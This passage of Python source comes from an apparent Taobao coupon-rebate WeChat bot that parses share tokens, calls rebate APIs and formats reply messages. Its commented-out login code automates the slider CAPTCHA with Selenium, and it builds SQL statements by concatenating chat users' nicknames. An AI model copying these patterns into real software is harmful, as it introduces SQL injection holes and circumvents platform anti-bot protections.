# 3,下完单后复制订单号发给我
# ''' % (q, price, coupon_amount, real_price, fx2, coupon_token)
# else:
# res_text = '''
# 一一一一淘宝返利信息一一一一
#
# 【商品名】%s
# 【淘宝价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,点击头像添加机器人为好友
# 3,下完单后复制订单号发给我
# ''' % (q, price, fx2, tao_token)
# return res_text
# Extract the taokouling (Taobao share token) from the message text
taokouling = ''  # default; if no token marker is found the lookup below falls through to the except handler
if '《' in msg['Text']:
taokouling = re.search(r'《.*?《', msg['Text']).group()
elif '¥' in msg['Text']:
taokouling = re.search(r'¥.*?¥', msg['Text']).group()
elif '€' in msg['Text']:
taokouling = re.search(r'€.*?€', msg['Text']).group()
res = self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_wireless_share_tpwd_query.php?str=' + taokouling, headers={'Connection':'close'})
resj = json.loads(res.text)
id = ''
urlToToken=''
if 'https://item.taobao.com' in resj['url']:
potten2 = resj['url'].split('&id=')
id = potten2[1].split('&sourceType')[0]
else:
potten = resj['url'].split('https://a.m.taobao.com/i')
id = potten[1].split('.htm')[0]
# Fetch the coupon link for this item
datares = self.se.get('http://api.hitui.net/privilege?type=1&appkey=JoB3RIns&id=%s&pid=%s&session=%s' % (id, config.get('SYS', 'PID'), config.get('SYS', 'SESSION')), headers={'Connection':'close'})
coupon_link = json.loads(datares.text)
if 'tbk_privilege_get_response' not in coupon_link or 'coupon_info' not in json.dumps(coupon_link):
# No coupon available: fall back to a recommendation link
tui_url = 'http://tuijian.ptjob.net/www/public/index.html%23/index/' + id
text = '''
一一一一 返利信息 一一一一
亲,当前商品优惠券已领完,为您精选如下优惠券商品
精选好券:'''+tui_url+'''
'''
return text
coupon_link = json.loads(datares.text)['tbk_privilege_get_response']['result']['data']
# Parse the coupon amount (yuan): the number between '减' and '元' in coupon_info
coupon_price = coupon_link['coupon_info'].split('减')[1].split('元')[0]
ress=self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_tbk_tpwd_create.php?title='+resj['content']+'&counp_link='+coupon_link['coupon_click_url']+'&image_link='+resj['pic_url'], headers={'Connection':'close'})
# Convert the coupon link into a new Taobao share token
urlToToken = json.loads(ress.text)['data']['model']
# Red-packet rebate: (price after coupon) * commission rate / 100, scaled by the BN.bn3t share
fx = round((round((float(resj['price']) - int(coupon_price)) * float(coupon_link['max_commission_rate']), 2) / 100) * float(config.get('BN', 'bn3t')), 2)
# Swap the first and last characters of the token for a random emoji marker
tu = {0: '🗝', 1: '📲', 2: '🎵'}
n = random.randint(0, 2)
tao_token = urlToToken.replace(urlToToken[:1], tu[n])
tao_token = tao_token.replace(tao_token[-1:], tu[n])
res_text = '''
一一一一返利信息一一一一
【商品名】%s
【淘宝价】%s元
【优惠券】%s元
【返红包】%.2f元
【淘链接】%s
获取返红包步骤:
1,复制本条消息打开淘宝领券
2,点击头像添加机器人为好友
3,下完单后复制订单号发给我
''' % (resj['content'], resj['price'], coupon_price, fx, tao_token)
return res_text
except Exception as e:
trace = traceback.format_exc()
print("error:{},trace:{}".format(str(e), trace))
info = '''
一一一一 返利信息 一一一一
亲,当前商品暂无优惠券,建议您换一个商品试试呢。
京东优惠券商城:
'''+config.get('URL', 'jdshop')+'''
淘宝优惠券商城:
'''+config.get('URL', 'tbshop')+'''
邀请好友得返利说明:
'''+config.get('URL', 'lnvit')+'''
'''
return info
# Start a background thread that periodically visits the Alimama home page so the login
# cookie stays valid (the cookie/login helpers below are all commented out).
# def start_keep_cookie_thread(self):
# t = Thread(target=self.visit_main_url, args=())
# t.setDaemon(True)
# t.start()
#
# def start_keep_get_order(self, bot):
# t = Thread(target=self.getOrderInfo, args=(bot,))
# t.setDaemon(True)
# t.start()
#
# def visit_main_url(self):
# url = "https://pub.alimama.com/"
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/common/getUnionPubContextInfo.json',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# while True:
# time.sleep(60 * 5)
# try:
# self.get_url(url, headers)
# real_url = "https://detail.tmall.com/item.htm?id=42485910384"
# res = self.get_detail2(real_url)
# print('淘宝登录验证.....', res)
# except Exception as e:
# # 给管理员发送登录过期消息
# adminuser = self.bot2.friends().search(config.get('ADMIN', 'ADMIN_USER'))[0]
# text = '''
# ---------- 系统提醒 ----------
#
# 机器人【%s】, 淘宝登录失效
# ''' % (self.bot2.self.nick_name)
# adminuser.send(text)
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 获取商品详情
# def get_detail2(self, q):
# cm = ConnectMysql()
# try:
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# url = 'http://pub.alimama.com/items/search.json?q=%s&_t=%s&auctionTag=&perPageSize=40&shopTag=&t=%s&_tb_token_=%s&pvid=%s' % (
# urllib.quote(q.encode('utf8')), t, t, tb_token, pvid)
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/items/search.json?%s' % url.split('search.json?')[-1],
# 'accept': 'application/json, text/javascript, */*; q=0.01',
# 'x-requested-with': 'XMLHttpRequest',
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'referer': 'https://pub.alimama.com',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# if rj['data']['pageList'] != None:
# return rj['data']['pageList'][0]
# else:
# return 'no match item'
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# def get_url(self, url, headers):
# res = self.se.get(url, headers=headers)
# return res
#
# def post_url(self, url, headers, data):
# res = self.se.post(url, headers=headers, data=data)
# return res
#
# def load_cookies(self):
# if os.path.isfile(cookie_fname):
# with open(cookie_fname, 'r') as f:
# c_str = f.read().strip()
# self.set_cookies(c_str)
#
# def set_cookies(self, c_str):
# try:
# cookies = json.loads(c_str)
# except:
# return
# for c in cookies:
# self.se.cookies.set(c[0], c[1])
#
# # check login
# def check_login(self):
# url = 'https://pub.alimama.com/common/getUnionPubContextInfo.json'
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/common/getUnionPubContextInfo.json',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
#
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text)
# return rj
#
# def visit_login_rediret_url(self, url):
# headers = {
# 'method': 'GET',
# 'authority': 'login.taobao.com',
# 'scheme': 'https',
# 'path': '/member/loginByIm.do?%s' % url.split('loginByIm.do?')[-1],
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# self.logger.debug(res.status_code)
#
# def get_scan_qr_status(self, lg_token):
# defaulturl = 'http://login.taobao.com/member/taobaoke/login.htm?is_login=1'
# url = 'https://qrlogin.taobao.com/qrcodelogin/qrcodeLoginCheck.do?lgToken=%s&defaulturl=%s&_ksTS=%s_30&callback=jsonp31' % (
# lg_token, defaulturl, int(time.time() * 1000))
# headers = {
# 'method': 'GET',
# 'authority': 'qrlogin.taobao.com',
# 'scheme': 'https',
# 'path': '/qrcodelogin/qrcodeLoginCheck.do?%s' % url.split('qrcodeLoginCheck.do?')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': '*/*',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text.replace('(function(){jsonp31(', '').replace(');})();', ''))
# self.logger.debug(rj)
# return rj
#
# def show_qr_image(self):
# self.logger.debug('begin to show qr image')
# url = 'https://qrlogin.taobao.com/qrcodelogin/generateQRCode4Login.do?from=alimama&_ksTS=%s_30&callback=jsonp31' % int(
# time.time() * 1000)
#
# # get qr image
# headers = {
# 'method': 'GET',
# 'authority': 'qrlogin.taobao.com',
# 'scheme': 'https',
# 'path': '/qrcodelogin/generateQRCode4Login.do?%s' % url.split('generateQRCode4Login.do?')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': '*/*',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh-CN,zh;q=0.8',
# }
#
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text.replace('(function(){jsonp31(', '').replace(');})();', ''))
# lg_token = rj['lgToken']
# url = 'https:%s' % rj['url']
#
# headers = {
# 'method': 'GET',
# 'authority': 'img.alicdn.com',
# 'scheme': 'https',
# 'path': '/tfscom/%s' % url.split('tfscom/')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': 'image/webp,image/*,*/*;q=0.8',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# qrimg = BytesIO(res.content)
# self.logger.debug(u"begin qr")
#
# sysstr = platform.system()
# if (sysstr == "Windows"):
# # windows下可能无法打印请用下列代码
# img = Image.open(qrimg)
# img.show()
#
# elif (sysstr == "Linux") or (sysstr == "Darwin"):
# # 读取url
# import zbarlight
# img = Image.open(qrimg)
# codes = zbarlight.scan_codes('qrcode', img)
# qr_url = codes[0]
# # 使用pyqrcode在终端打印,只在linux下可以用
# pyqrcode_url = pyqrcode.create(qr_url)
# self.logger.debug(pyqrcode_url.terminal())
#
# self.logger.debug(u"请使用淘宝客户端扫码")
# return lg_token
#
# def get_qr_image(self):
# url = 'https://qrlogin.taobao.com/qrcodelogin/generateQRCode4Login.do?from=alimama&_ksTS=%s_30&callback=jsonp31' % int(
# time.time() * 1000)
#
# # get qr image
# headers = {
# 'method': 'GET',
# 'authority': 'qrlogin.taobao.com',
# 'scheme': 'https',
# 'path': '/qrcodelogin/generateQRCode4Login.do?%s' % url.split('generateQRCode4Login.do?')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': '*/*',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'zh-CN,zh;q=0.8',
# }
#
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text.replace('(function(){jsonp31(', '').replace(');})();', ''))
# lg_token = rj['lgToken']
# url = 'https:%s' % rj['url']
#
# headers = {
# 'method': 'GET',
# 'authority': 'img.alicdn.com',
# 'scheme': 'https',
# 'path': '/tfscom/%s' % url.split('tfscom/')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': 'image/webp,image/*,*/*;q=0.8',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# qrimg = BytesIO(res.content)
# self.logger.debug("TaoBao Login Out!")
# return qrimg
#
# # do login
# def do_login(self):
# self.logger.debug('begin to login')
# # show qr image
# lg_token = self.show_qr_image()
# t0 = time.time()
# while True:
# rj = self.get_scan_qr_status(lg_token)
# # 扫码成功会有跳转
# if 'url' in rj:
# self.visit_login_rediret_url(rj['url'])
# self.logger.debug('login success')
# # self.logger.debug(self.se.cookies)
# with open(cookie_fname, 'w') as f:
# f.write(json.dumps(self.se.cookies.items()))
# return 'login success'
# # 二维码过一段时间会失效
# if time.time() - t0 > 60 * 5:
# self.logger.debug('scan timeout')
# return
# time.sleep(0.5)
#
# def login(self):
# try:
# clr = self.check_login()
# print('Checking login ...............', clr)
# self.myip = clr['data']['ip']
# if 'mmNick' in clr['data']:
# self.logger.debug(u"淘宝已经登录 不需要再次登录")
# return 'login success'
# else:
# dlr = self.open_do_login()
# if dlr is None:
# return 'login failed'
# else:
# return 'login success'
# except Exception as e:
# trace = traceback.format_exc()
# return 'login failed'
#
# def open_do_login(self):
# # loginname = input('请输入淘宝联盟账号:')
# # nloginpwd = input('请输入淘宝联盟密码:')
# #profileDir = "C:\\Users\pengtao\AppData\Local\Mozilla\Firefox\Profiles\\24xolutj.default"
#
# #profile = webdriver.FirefoxProfile(profileDir)
# #print(profile)
# #wd = webdriver.Firefox(profile)
# wd = webdriver.Firefox()
#
# wd.get('http://pub.alimama.com')
#
# time.sleep(20)
#
# #js = "var pass = document.getElementById(\"TPL_password_1\").setAttribute(\"autocomplete\", \"on\")"
#
# #wd.execute_script(js)
# wd.switch_to.frame('taobaoLoginIfr')
# time.sleep(3)
# wd.find_element_by_class_name('login-switch').click()
# time.sleep(3)
# # 输入账号密码
# wd.find_element_by_id('TPL_username_1').send_keys(config.get('TB', 'TB_USERNAME'))
# # 休息3秒
# time.sleep(3)
# # 输入密码
# wd.find_element_by_id('TPL_password_1').send_keys(config.get('TB', 'TB_PASSWORD'))
# # 点击登录按钮
# time.sleep(2)
# while True:
# # 定位滑块元素
# source = wd.find_element_by_xpath("//*[@id='nc_1_n1z']")
# # 定义鼠标拖放动作
# ActionChains(wd).drag_and_drop_by_offset(source, 400, 0).perform()
#
# # 等待JS认证运行,如果不等待容易报错
# time.sleep(2)
#
# text = wd.find_element_by_xpath("//div[@id='nc_1__scale_text']/span")
# # 目前只碰到3种情况:成功(请在在下方输入验证码,请点击图);无响应(请按住滑块拖动);失败(哎呀,失败了,请刷新)
# if text.text.startswith(u'哎呀,出错了,点击'):
# print('滑动失败!Begin to try.....')
# # 这里定位失败后的刷新按钮,重新加载滑块模块
# wd.find_element_by_xpath("//div[@id='havana_nco']/div/span/a").click()
# time.sleep(3)
# continue
# wd.find_element_by_id('J_SubmitStatic').click()
#
# # 判断是否需要验证码
# # time.sleep(10)
#
# # if self.isElementExist(wd, 'J_LoginCheck'):
# # print('验证码存在!睡眠120秒')
# # time.sleep(160)
#
# # self.logger.debug('login success')
# # with open(cookie_fname, 'w') as f:
# # cookies_arr = []
# # for item in wd.get_cookies():
# # cookies_arr.append([item['name'], item['value']])
# #
# # f.write(json.dumps(cookies_arr))
# #
# # wd.quit()
# #
# # return 'login success'
#
# def isElementExist(self, bower, element):
# try:
# bower.find_element_by_id(element)
# return True
# except Exception as e:
# return False
#
# def get_tb_token(self):
# tb_token = None
# for c in self.se.cookies.items():
# if c[0] == '_tb_token_':
# return c[1]
# if tb_token is None:
# return 'test'
#
# # 获取商品详情
# def get_detail(self, bot, q, raw):
# cm = ConnectMysql()
# # 用户第一次查询,修改备注
# query_good = cm.ExecQuery("SELECT * FROM taojin_query_record WHERE puid='" + raw.sender.puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# if query_good == ():
# se = re.compile('^(\d+)_(\d+)_\w_(\d)+$')
# if se.search(raw.sender.remark_name) == None:
# remarkName = self.ort.generateRemarkName(bot)
# split_arr2 = remarkName.split('_')
# new_remark_name2 = '%s%s%s%s%s%s%s' % (split_arr2[0], '_', split_arr2[1], '_', 'B', '_', split_arr2[3])
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name2)
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name2+"' WHERE puid='" + raw.sender.puid + "' AND bot_puid='" + bot.self.puid + "'")
# else:
# split_arr = raw.sender.remark_name.split('_')
# new_remark_name = '%s%s%s%s%s%s%s' % (split_arr[0], '_', split_arr[1], '_', 'B', '_', split_arr[3])
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name)
#
# # 修改数据库
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name+"' WHERE puid='" + raw.sender.puid + "' AND bot_puid='" + bot.self.puid + "'")
# try:
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# url = 'http://pub.alimama.com/items/search.json?q=%s&_t=%s&auctionTag=&perPageSize=40&shopTag=&t=%s&_tb_token_=%s&pvid=%s' % (
# urllib.quote(q.encode('utf8')), t, t, tb_token, pvid)
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/items/search.json?%s' % url.split('search.json?')[-1],
# 'accept': 'application/json, text/javascript, */*; q=0.01',
# 'x-requested-with': 'XMLHttpRequest',
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'referer': 'https://pub.alimama.com',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'en-US,en;q=0.5',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# if rj['data']['pageList'] != None:
# insert_sql = "INSERT INTO taojin_query_record(wx_bot, good_title, good_price, good_coupon, username, create_time, puid, bot_puid, skuid, type) VALUES('" + bot.self.nick_name + "', '" + rj['data']['pageList'][0]['title'] + "', '" + str(rj['data']['pageList'][0]['zkPrice']) + "', '"+ str(rj['data']['pageList'][0]['couponAmount']) +"', '" + raw.sender.nick_name + "', '" + str(time.time()) + "', '"+raw.sender.puid+"', '"+bot.self.puid+"', '"+ str(rj['data']['pageList'][0]['auctionId']) +"', '2')"
# cm.ExecNonQuery(insert_sql)
# cm.Close()
# return rj['data']['pageList'][0]
# else:
# return 'no match item'
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 获取商品详情
# def get_group_detail(self, bot, q, raw):
# cm = ConnectMysql()
# chatrooms = bot.core.search_chatrooms(userName=raw.raw['FromUserName'])
# try:
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# url = 'http://pub.alimama.com/items/search.json?q=%s&_t=%s&auctionTag=&perPageSize=40&shopTag=&t=%s&_tb_token_=%s&pvid=%s' % (
# urllib.quote(q.encode('utf8')), t, t, tb_token, pvid)
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/items/search.json?%s' % url.split('search.json?')[-1],
# 'accept': 'application/json, text/javascript, */*; q=0.01',
# 'x-requested-with': 'XMLHttpRequest',
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'referer': 'https://pub.alimama.com',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'en-US,en;q=0.5',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# if rj['data']['pageList'] != None:
# insert_sql = "INSERT INTO taojin_query_record(wx_bot, good_title, good_price, good_coupon, username, create_time, puid, bot_puid, chatroom, skuid, type) VALUES('" + bot.self.nick_name + "', '" + rj['data']['pageList'][0]['title'] + "', '" + str(rj['data']['pageList'][0]['zkPrice']) + "', '"+ str(rj['data']['pageList'][0]['couponAmount']) +"', '" + raw.member.nick_name + "', '" + str(time.time()) + "', '"+ raw.member.puid +"', '"+ bot.self.puid +"', '"+ chatrooms['NickName'] +"', '"+ str(rj['data']['pageList'][0]['auctionId']) +"', '2')"
# cm.ExecNonQuery(insert_sql)
# cm.Close()
# return rj['data']['pageList'][0]
# else:
# return 'no match item'
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 获取淘宝客链接
# def get_tk_link(self, auctionid):
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# try:
# gcid, siteid, adzoneid = self.__get_tk_link_s1(auctionid, tb_token, pvid)
# self.__get_tk_link_s2(gcid, siteid, adzoneid, auctionid, tb_token, pvid)
# res = self.__get_tk_link_s3(auctionid, adzoneid, siteid, tb_token, pvid)
# return res
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 第一步,获取推广位相关信息
# def __get_tk_link_s1(self, auctionid, tb_token, pvid):
# url = 'http://pub.alimama.com/common/adzone/newSelfAdzone2.json?tag=29&itemId=%s&blockId=&t=%s&_tb_token_=%s&pvid=%s' % (
# auctionid, int(time.time() * 1000), tb_token, pvid)
# headers = {
# 'Host': 'pub.alimama.com',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/promo/search/index.htm',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# gcid = rj['data']['otherList'][0]['gcid']
# siteid = rj['data']['otherList'][0]['siteid']
# adzoneid = rj['data']['otherAdzones'][0]['sub'][0]['id']
# return gcid, siteid, adzoneid
#
# # post数据
# def __get_tk_link_s2(self, gcid, siteid, adzoneid, auctionid, tb_token, pvid):
# url = 'http://pub.alimama.com/common/adzone/selfAdzoneCreate.json'
# data = {
# 'tag': '29',
# 'gcid': gcid,
# 'siteid': siteid,
# 'selectact': 'sel',
# 'adzoneid': adzoneid,
# 't': int(time.time() * 1000),
# '_tb_token_': tb_token,
# 'pvid': pvid,
# }
# headers = {
# 'Host': 'pub.alimama.com',
# 'Content-Length': str(len(json.dumps(data))),
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'Origin': 'http://pub.alimama.com',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
# 'Referer': 'http://pub.alimama.com/promo/search/index.htm',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
#
# res = self.post_url(url, headers, data)
# return res
#
# # 获取口令
# def __get_tk_link_s3(self, auctionid, adzoneid, siteid, tb_token, pvid):
# url = 'http://pub.alimama.com/common/code/getAuctionCode.json?auctionid=%s&adzoneid=%s&siteid=%s&scenes=1&t=%s&_tb_token_=%s&pvid=%s' % (
# auctionid, adzoneid, siteid, int(time.time() * 1000), tb_token, pvid)
# headers = {
# 'Host': 'pub.alimama.com',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/promo/search/index.htm',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# rj = json.loads(res.text)
# return rj['data']
#
# def get_real_url(self, url):
# try:
# headers = {
# 'Host': url.split('http://')[-1].split('/')[0],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# if re.search(r'itemId\":\d+', res.text):
# item_id = re.search(r'itemId\":\d+', res.text).group().replace('itemId":', '').replace('https://',
# 'http://')
# r_url = "https://detail.tmall.com/item.htm?id=%s" % item_id
# elif re.search(r"var url = '.*';", res.text):
# r_url = re.search(r"var url = '.*';", res.text).group().replace("var url = '", "").replace("';",
# "").replace(
# 'https://', 'http://')
# else:
# r_url = res.url
# if 's.click.taobao.com' in r_url:
# r_url = self.handle_click_type_url(r_url)
# else:
# while ('detail.tmall.com' not in r_url) and ('item.taobao.com' not in r_url) and (
# 'detail.m.tmall.com' not in r_url):
# headers1 = {
# 'Host': r_url.split('http://')[-1].split('/')[0],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res2 = self.get_url(r_url, headers1)
# self.logger.debug("{},{},{},{}".format(res2.url, res2.status_code, res2.history, res2.text))
# r_url = res2.url
#
# return r_url
# except Exception as e:
# self.logger.warning(str(e))
# return url
#
# def handle_click_type_url(self, url):
# # step 1
# headers = {
# 'method': 'GET',
# 'authority': 's.click.taobao.com',
# 'scheme': 'https',
# 'path': '/t?%s' % url.split('/t?')[-1],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# self.logger.debug("{},{},{}".format(res.url, res.status_code, res.history))
# url2 = res.url
#
# # step 2
# headers2 = {
# 'referer': url,
# 'method': 'GET',
# 'authority': 's.click.taobao.com',
# 'scheme': 'https',
# 'path': '/t?%s' % url2.split('/t?')[-1],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res2 = self.get_url(url2, headers2)
# self.logger.debug("{},{},{}".format(res2.url, res2.status_code, res2.history))
# url3 = urllib.unquote(res2.url.split('t_js?tu=')[-1])
#
# # step 3
# headers3 = {
# 'referer': url2,
# 'method': 'GET',
# 'authority': 's.click.taobao.com',
# 'scheme': 'https',
# 'path': '/t?%s' % url3.split('/t?')[-1],
# 'Upgrade-Insecure-Requests': '1',
